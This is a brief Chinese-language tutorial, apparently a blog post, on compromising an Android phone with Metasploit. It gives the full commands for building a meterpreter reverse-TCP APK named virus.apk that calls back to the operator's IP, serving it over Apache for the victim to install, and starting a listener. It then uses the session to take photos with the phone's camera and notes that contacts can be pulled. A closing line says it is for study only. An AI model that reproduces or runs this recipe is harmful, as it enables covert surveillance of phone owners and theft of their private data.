利用msf框架對安卓手機進行簡單操作

測試機型紅米k30

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.106 LPORT=8888 R > virus.apk （輸入自己的ip,設置端口和apk格式,生成apk）

 service apache2 start  （啟動服務）

 sudo cp virus.apk /var/www/html   （復制該文件到html，這里需要管理員權限，前面加sudo，后面再輸入不可見密碼）

ls virus.apk /var/www/html（查看文件是否在當前文件夾下）

msfconsole （啟動metasploit框架）

use multi/handler(在kali設置監聽程序)

 set payload android/meterpreter/reverse_tcp(設置載體，工具，協議)

options（查看配置）

set lhost 自己的ip（與前面的apk一樣）

set lport 端口號（同上）

接下來在手機上裝apk，瀏覽器搜索192.168.0.106/virus.apk

run(啟動) 

webcam_snap(利用手機進行拍照，注：這里已經在手機開啟了權限設置，并且程序在運行中)

還可以用命令獲取聯系人等。

輸入？可提示各種功能，這里就不一一列舉啦！ 

本篇僅供學習，請勿用于其他非法用途。